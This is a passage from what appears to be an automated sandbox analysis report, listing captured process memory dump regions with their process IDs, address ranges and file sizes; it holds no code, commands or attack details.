                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/2460-211-0x000001EE50C80000-0x000001EE50CF1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/2480-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/2480-334-0x0000000000400000-0x000000000064F000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                2.3MB

                                                                                                                                                                              • memory/2624-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/2660-248-0x000002271FD30000-0x000002271FDA1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/2688-251-0x000002856FB70000-0x000002856FBE1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/2696-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/2768-203-0x00000255D1BD0000-0x00000255D1C41000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/2884-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3024-243-0x0000000002380000-0x0000000002395000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                84KB

                                                                                                                                                                              • memory/3024-400-0x0000000004220000-0x0000000004236000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                88KB

                                                                                                                                                                              • memory/3044-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3192-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3284-428-0x0000000004100000-0x000000000415D000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                372KB

                                                                                                                                                                              • memory/3284-423-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3284-427-0x0000000004181000-0x0000000004282000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                1.0MB

                                                                                                                                                                              • memory/3372-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3380-430-0x0000022196120000-0x000002219616C000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                304KB

                                                                                                                                                                              • memory/3380-187-0x0000022196190000-0x0000022196201000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/3380-433-0x0000022196280000-0x00000221962F1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                452KB

                                                                                                                                                                              • memory/3380-183-0x00000221960D0000-0x000002219611C000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                304KB

                                                                                                                                                                              • memory/3484-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3484-176-0x0000000000030000-0x0000000000039000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                36KB

                                                                                                                                                                              • memory/3484-177-0x0000000000400000-0x0000000000896000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4.6MB

                                                                                                                                                                              • memory/3488-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3864-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3880-348-0x0000000004FE0000-0x0000000004FE1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/3880-341-0x00000000005A0000-0x00000000005A1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/3880-329-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3908-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3908-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3960-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3964-166-0x00000000009C0000-0x00000000009C1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/3964-171-0x000000001B540000-0x000000001B542000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                              • memory/3964-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/3980-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4024-330-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4024-420-0x00000275F6190000-0x00000275F6260000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                832KB

                                                                                                                                                                              • memory/4048-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4160-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4160-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4168-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4200-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4200-213-0x0000000000C00000-0x0000000000C01000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4204-463-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4216-459-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4380-356-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                644KB

                                                                                                                                                                              • memory/4380-349-0x0000000000400000-0x00000000004A1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                644KB

                                                                                                                                                                              • memory/4380-352-0x000000000046B76D-mapping.dmp
                                                                                                                                                                              • memory/4420-316-0x0000000000418826-mapping.dmp
                                                                                                                                                                              • memory/4420-314-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                120KB

                                                                                                                                                                              • memory/4420-340-0x0000000002A50000-0x0000000002A51000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4572-460-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4636-350-0x00000000001E0000-0x00000000001EA000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                40KB

                                                                                                                                                                              • memory/4636-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4648-362-0x0000000000400000-0x00000000004C0000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                768KB

                                                                                                                                                                              • memory/4648-358-0x0000000002030000-0x00000000020CD000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                628KB

                                                                                                                                                                              • memory/4648-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4660-386-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4660-259-0x0000000005440000-0x0000000005441000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4660-415-0x0000000000A90000-0x0000000000ABE000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                184KB

                                                                                                                                                                              • memory/4660-326-0x0000000005330000-0x000000000533E000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                56KB

                                                                                                                                                                              • memory/4660-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4660-416-0x0000000000400000-0x00000000009BE000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                5.7MB

                                                                                                                                                                              • memory/4660-246-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4720-291-0x0000000001380000-0x0000000001381000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4720-281-0x0000000001350000-0x0000000001373000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                140KB

                                                                                                                                                                              • memory/4720-271-0x0000000001340000-0x0000000001341000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4720-282-0x0000000001630000-0x0000000001632000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                              • memory/4720-258-0x0000000000D20000-0x0000000000D21000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4720-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4728-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4756-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4756-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4772-311-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4784-396-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4804-345-0x00000258B7030000-0x00000258B709F000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                444KB

                                                                                                                                                                              • memory/4804-342-0x00000258B74C0000-0x00000258B7590000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                832KB

                                                                                                                                                                              • memory/4804-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4820-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4828-299-0x00000000067C0000-0x00000000067C1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-287-0x0000000077020000-0x00000000771AE000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                1.6MB

                                                                                                                                                                              • memory/4828-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4828-301-0x0000000006160000-0x0000000006161000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-337-0x00000000063B0000-0x00000000063B1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-309-0x0000000006230000-0x0000000006231000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-307-0x00000000061A0000-0x00000000061A1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4828-293-0x00000000011D0000-0x00000000011D1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4852-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4864-382-0x0000000002204000-0x0000000002206000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                8KB

                                                                                                                                                                              • memory/4864-357-0x0000000000480000-0x000000000052E000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                696KB

                                                                                                                                                                              • memory/4864-360-0x0000000002200000-0x0000000002201000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4864-361-0x0000000000400000-0x000000000047D000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                500KB

                                                                                                                                                                              • memory/4864-366-0x0000000002202000-0x0000000002203000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4864-368-0x0000000002203000-0x0000000002204000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4864-254-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4888-274-0x0000000000E50000-0x0000000000E51000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4888-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4888-288-0x0000000005810000-0x0000000005811000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4940-404-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                9.3MB

                                                                                                                                                                              • memory/4940-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4940-403-0x0000000002E50000-0x0000000003776000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                9.1MB

                                                                                                                                                                              • memory/4968-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4972-388-0x0000000000417E1A-mapping.dmp
                                                                                                                                                                              • memory/4972-401-0x00000000054F0000-0x0000000005AF6000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                6.0MB

                                                                                                                                                                              • memory/4984-284-0x0000000004D50000-0x0000000004D51000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4984-283-0x0000000004F60000-0x0000000004F61000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4984-263-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/4984-272-0x0000000000570000-0x0000000000571000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4984-305-0x0000000005470000-0x0000000005471000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/4984-277-0x0000000004DD0000-0x0000000004DD1000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/5016-295-0x0000000077020000-0x00000000771AE000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                1.6MB

                                                                                                                                                                              • memory/5016-303-0x0000000005B50000-0x0000000005B51000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/5016-308-0x0000000005B00000-0x0000000005B01000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/5016-297-0x0000000000D90000-0x0000000000D91000-memory.dmp
                                                                                                                                                                                Filesize

                                                                                                                                                                                4KB

                                                                                                                                                                              • memory/5016-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5228-478-0x0000000000000000-mapping.dmp
                                                                                                                                                                              • memory/5236-479-0x0000000000000000-mapping.dmp